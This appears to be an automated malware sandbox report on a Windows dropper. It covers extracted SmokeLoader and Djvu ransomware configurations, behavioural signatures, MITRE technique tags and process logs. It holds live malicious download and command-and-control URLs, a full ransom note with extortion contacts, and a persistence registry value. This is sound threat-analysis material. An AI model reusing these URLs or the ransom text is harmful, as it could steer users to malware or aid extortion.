dcrat | 0c951f58a23cd2c9bdccb727d41e33e740344af36d91419907ce016977b2a62d

max time kernel
1813s
max time network
1833s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
22-12-2023 08:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

djvu

http://zexeq.com/test1/get.php

Attributes

extension
.loqw
offline_id
NrqpaQRhQqq5l2tBPp1QS34I3ME2IKsAlZ0A9pt1
payload_url
http://brusuax.com/dl/build2.exe

http://zexeq.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-MhbiRFXgXD Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0838ASdw

rsa_pubkey.plain

Signatures

DcRat 7 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe4363463463464363463463463.exeschtasks.exe

pid	process
4196	schtasks.exe
4592	schtasks.exe
1048	schtasks.exe
6068	schtasks.exe
6284	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Root	4363463463464363463463463.exe
6836	schtasks.exe

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\UNION.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\autorun.exe	family_zgrat_v1

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral4/memory/4684-572-0x0000000002390000-0x00000000024AB000-memory.dmp	family_djvu
behavioral4/memory/1160-574-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral4/memory/1160-573-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral4/memory/1160-575-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral4/memory/1160-579-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\ytlogsbot.exe	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

brg.exe

description pid process target process

PID 3972 created 2824 3972 brg.exe sihost.exe

description	pid	process	target process
PID 3972 created 2824	3972	brg.exe	sihost.exe

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 30 IoCs

Processes:

tuc3.exe4iBpiQUavIMb.exetuc3.tmptuc6.exetuc6.tmpSystemUpdate.exefcontrolstd.exetoolspub2.exetoolspub2.exetuc5.exetuc5.tmpB3F6.exeVLTKBacdau.exeB3F6.exeghjkl.exefcontrolstd.exeOpolis.exeBLduscfibj.exeConhost.execacls.exebrg.exeBLduscfibj.exeBLduscfibj.exeEF9A.exeTat tow roc koyor manax wodebib haninew dolixo.exea3e34cb.exeytlogsbot.exeUNION.exeOSM-Client.exebstyoops.exe

pid	process
3624	tuc3.exe
1936	4iBpiQUavIMb.exe
4988	tuc3.tmp
2708	tuc6.exe
2284	tuc6.tmp
1808	SystemUpdate.exe
4068	fcontrolstd.exe
2008	toolspub2.exe
1056	toolspub2.exe
2124	tuc5.exe
3708	tuc5.tmp
4684	B3F6.exe
4648	VLTKBacdau.exe
1160	B3F6.exe
4172	ghjkl.exe
4428	fcontrolstd.exe
3756	Opolis.exe
2552	BLduscfibj.exe
3472	Conhost.exe
1124	cacls.exe
3972	brg.exe
1276	BLduscfibj.exe
2876	BLduscfibj.exe
3160	EF9A.exe
2528	Tat tow roc koyor manax wodebib haninew dolixo.exe
4316	a3e34cb.exe
2840	ytlogsbot.exe
3768	UNION.exe
3060	OSM-Client.exe
1880	bstyoops.exe

Loads dropped DLL 64 IoCs

Processes:

tuc3.tmptuc6.tmptuc5.tmpConhost.exeOSM-Client.exe

pid	process
4988	tuc3.tmp
4988	tuc3.tmp
4988	tuc3.tmp
2284	tuc6.tmp
2284	tuc6.tmp
2284	tuc6.tmp
3708	tuc5.tmp
3708	tuc5.tmp
3708	tuc5.tmp
3472	Conhost.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe
3060	OSM-Client.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2232 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2232	icacls.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\amd.exe	themida
C:\Users\Admin\AppData\Local\Temp\FANBooster131\FANBooster131.exe	themida

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\lve.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\a3e34cb.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

B3F6.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8e6dd4f5-e1d7-4761-85cc-336fccaa8b6b\\B3F6.exe\" --AutoStart"	B3F6.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

790 api.2ip.ua
1 api.2ip.ua
349 ipinfo.io
742 api.2ip.ua
764 api.2ip.ua
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

VLTKBacdau.exe

description ioc process

File opened for modification \??\PhysicalDrive0 VLTKBacdau.exe

flow	ioc
790	api.2ip.ua
1	api.2ip.ua
349	ipinfo.io
742	api.2ip.ua
764	api.2ip.ua

description	ioc	process
File opened for modification	\??\PhysicalDrive0	VLTKBacdau.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

toolspub2.exeB3F6.exeghjkl.exeBLduscfibj.exeConhost.exe

description	pid	process	target process
PID 2008 set thread context of 1056	2008	toolspub2.exe	toolspub2.exe
PID 4684 set thread context of 1160	4684	B3F6.exe	B3F6.exe
PID 4172 set thread context of 3972	4172	ghjkl.exe	brg.exe
PID 2552 set thread context of 2876	2552	BLduscfibj.exe	BLduscfibj.exe
PID 3472 set thread context of 2040	3472	Conhost.exe	B3F6.exe

Drops file in Program Files directory 64 IoCs

Processes:

tuc5.tmptuc6.tmptuc3.tmp

description	ioc	process
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-2KEKB.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-O6GAC.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-R3OKQ.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-4T5PE.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-VOBFO.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-3RNMU.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-LL5VU.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-S16O5.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-G9S7S.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-IHNI3.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-UT6TV.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-D2EAC.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-4I7T0.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-G92TL.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\plugins\internal\is-MFPHO.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-R19UD.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-3THBK.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-O0H8S.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-BTME2.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-4TPOP.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-31PBM.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-JH3GO.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-IT1A5.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-I39B1.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-BEL8V.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-DP6MU.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-IJ29U.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-JN18K.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-VT551.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\is-D8DFJ.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-QK1OF.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-9R3DO.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-6GQIE.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\lessmsi\is-VEHBK.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-A4VBR.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-REFS0.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-JTCV7.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-6QM64.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\stuff\is-G5Q0D.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-HT9RH.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-6VN4Q.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-RR9K2.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-NL81S.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-H7L9T.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-2N98P.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-L75IQ.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\is-NA7JD.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-HCG6Q.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-MS7CE.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-OGJND.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-7VUI0.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-2CB2R.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-K12I6.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-1I2J1.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-P0A4J.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-QE0JD.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-N6QBP.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-8JHEP.tmp	tuc6.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-AM4VB.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\stuff\is-DN20A.tmp	tuc3.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-OT626.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-IO8L9.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-M84K5.tmp	tuc5.tmp
File created	C:\Program Files (x86)\FlatControlSTD\bin\x86\is-RKJIL.tmp	tuc3.tmp

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3032 sc.exe
6480 sc.exe
1280 sc.exe
5156 sc.exe
2992 sc.exe
2540 sc.exe
2752 sc.exe
948 sc.exe
2912 sc.exe
6672 sc.exe

pid	process
3032	sc.exe
6480	sc.exe
1280	sc.exe
5156	sc.exe
2992	sc.exe
2540	sc.exe
2752	sc.exe
948	sc.exe
2912	sc.exe
6672	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 19 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3960	4068	WerFault.exe	fcontrolstd.exe
5052	4068	WerFault.exe	fcontrolstd.exe
2252	3972	WerFault.exe	ghjkl.exe
1564	3972	WerFault.exe	ghjkl.exe
4484	2040	WerFault.exe	RegSvcs.exe
1872	776	WerFault.exe	B3F6.exe
1040	2236	WerFault.exe	asdfg.exe
3284	2236	WerFault.exe	asdfg.exe
4468	480	WerFault.exe	EAA7.exe
824	1616	WerFault.exe	32.exe
5284	4632	WerFault.exe	autorun.exe
3584	2456	WerFault.exe	WatchDog.exe
6676	2456	WerFault.exe	WatchDog.exe
6028	7024	WerFault.exe	4Vh716XG.exe
5828	5880	WerFault.exe	kb%5Efr_ouverture.exe
1060	3728	WerFault.exe	ww.exe
7112	6876	WerFault.exe	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
7016	5628	WerFault.exe	%E5%8F%91%E7%A5%A8%E7%94%B5%E8%84%91%E7%89%88-%E6%9C%8D%E5%8A%A1%E7%AB%AF_sos.exe
3784	5660	WerFault.exe	26a53caa59be5c918cfee530cd39363f8a409033d6c8af51d8f8900aa67acf9a.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4196 schtasks.exe
6284 schtasks.exe
4592 schtasks.exe
1048 schtasks.exe
6068 schtasks.exe
6836 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

936 timeout.exe
5832 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

5732 WMIC.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2640 tasklist.exe
3284 tasklist.exe
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXE

pid process

7044 NETSTAT.EXE
6048 NETSTAT.EXE
6936 NETSTAT.EXE
6044 NETSTAT.EXE
5820 NETSTAT.EXE
5236 NETSTAT.EXE
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

6096 taskkill.exe
Modifies registry class 1 IoCs

Processes:

Opolis.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Opolis.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4408 PING.EXE

pid	process
4196	schtasks.exe
6284	schtasks.exe
4592	schtasks.exe
1048	schtasks.exe
6068	schtasks.exe
6836	schtasks.exe

pid	process
936	timeout.exe
5832	timeout.exe

pid	process
5732	WMIC.exe

pid	process
2640	tasklist.exe
3284	tasklist.exe

pid	process
7044	NETSTAT.EXE
6048	NETSTAT.EXE
6936	NETSTAT.EXE
6044	NETSTAT.EXE
5820	NETSTAT.EXE
5236	NETSTAT.EXE

pid	process
6096	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Opolis.exe

pid	process
4408	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

4iBpiQUavIMb.exetoolspub2.exe

pid	process
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1936	4iBpiQUavIMb.exe
1056	toolspub2.exe
1056	toolspub2.exe
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232
3232

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

toolspub2.exe

pid process

1056 toolspub2.exe

pid	process
1056	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exeVLTKBacdau.exeSystemUpdate.exeghjkl.exeBLduscfibj.exeBLduscfibj.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1368	4363463463464363463463463.exe
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeDebugPrivilege	4648	VLTKBacdau.exe
Token: SeDebugPrivilege	1808	SystemUpdate.exe
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeDebugPrivilege	4172	ghjkl.exe
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeDebugPrivilege	2552	BLduscfibj.exe
Token: SeDebugPrivilege	2876	BLduscfibj.exe
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232
Token: SeCreatePagefilePrivilege	3232
Token: SeShutdownPrivilege	3232

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

tuc3.tmptuc6.tmptuc5.tmpOpolis.exea3e34cb.exe

pid process

4988 tuc3.tmp
2284 tuc6.tmp
3708 tuc5.tmp
3756 Opolis.exe
4316 a3e34cb.exe
3756 Opolis.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exetuc3.exetuc6.exetuc3.tmpnet.exetoolspub2.exetuc5.execmd.execmd.exeB3F6.exe

description	pid	process	target process
PID 1368 wrote to memory of 3624	1368	4363463463464363463463463.exe	tuc3.exe
PID 1368 wrote to memory of 3624	1368	4363463463464363463463463.exe	tuc3.exe
PID 1368 wrote to memory of 3624	1368	4363463463464363463463463.exe	tuc3.exe
PID 1368 wrote to memory of 1936	1368	4363463463464363463463463.exe	4iBpiQUavIMb.exe
PID 1368 wrote to memory of 1936	1368	4363463463464363463463463.exe	4iBpiQUavIMb.exe
PID 1368 wrote to memory of 1936	1368	4363463463464363463463463.exe	4iBpiQUavIMb.exe
PID 3624 wrote to memory of 4988	3624	tuc3.exe	tuc3.tmp
PID 3624 wrote to memory of 4988	3624	tuc3.exe	tuc3.tmp
PID 3624 wrote to memory of 4988	3624	tuc3.exe	tuc3.tmp
PID 1368 wrote to memory of 2708	1368	4363463463464363463463463.exe	tuc6.exe
PID 1368 wrote to memory of 2708	1368	4363463463464363463463463.exe	tuc6.exe
PID 1368 wrote to memory of 2708	1368	4363463463464363463463463.exe	tuc6.exe
PID 2708 wrote to memory of 2284	2708	tuc6.exe	tuc6.tmp
PID 2708 wrote to memory of 2284	2708	tuc6.exe	tuc6.tmp
PID 2708 wrote to memory of 2284	2708	tuc6.exe	tuc6.tmp
PID 1368 wrote to memory of 1808	1368	4363463463464363463463463.exe	SystemUpdate.exe
PID 1368 wrote to memory of 1808	1368	4363463463464363463463463.exe	SystemUpdate.exe
PID 1368 wrote to memory of 1808	1368	4363463463464363463463463.exe	SystemUpdate.exe
PID 4988 wrote to memory of 2812	4988	tuc3.tmp	net.exe
PID 4988 wrote to memory of 2812	4988	tuc3.tmp	net.exe
PID 4988 wrote to memory of 2812	4988	tuc3.tmp	net.exe
PID 4988 wrote to memory of 4068	4988	tuc3.tmp	fcontrolstd.exe
PID 4988 wrote to memory of 4068	4988	tuc3.tmp	fcontrolstd.exe
PID 4988 wrote to memory of 4068	4988	tuc3.tmp	fcontrolstd.exe
PID 1368 wrote to memory of 2008	1368	4363463463464363463463463.exe	toolspub2.exe
PID 1368 wrote to memory of 2008	1368	4363463463464363463463463.exe	toolspub2.exe
PID 1368 wrote to memory of 2008	1368	4363463463464363463463463.exe	toolspub2.exe
PID 2812 wrote to memory of 1092	2812	net.exe	net1.exe
PID 2812 wrote to memory of 1092	2812	net.exe	net1.exe
PID 2812 wrote to memory of 1092	2812	net.exe	net1.exe
PID 2008 wrote to memory of 1056	2008	toolspub2.exe	toolspub2.exe
PID 2008 wrote to memory of 1056	2008	toolspub2.exe	toolspub2.exe
PID 2008 wrote to memory of 1056	2008	toolspub2.exe	toolspub2.exe
PID 2008 wrote to memory of 1056	2008	toolspub2.exe	toolspub2.exe
PID 2008 wrote to memory of 1056	2008	toolspub2.exe	toolspub2.exe
PID 2008 wrote to memory of 1056	2008	toolspub2.exe	toolspub2.exe
PID 1368 wrote to memory of 2124	1368	4363463463464363463463463.exe	tuc5.exe
PID 1368 wrote to memory of 2124	1368	4363463463464363463463463.exe	tuc5.exe
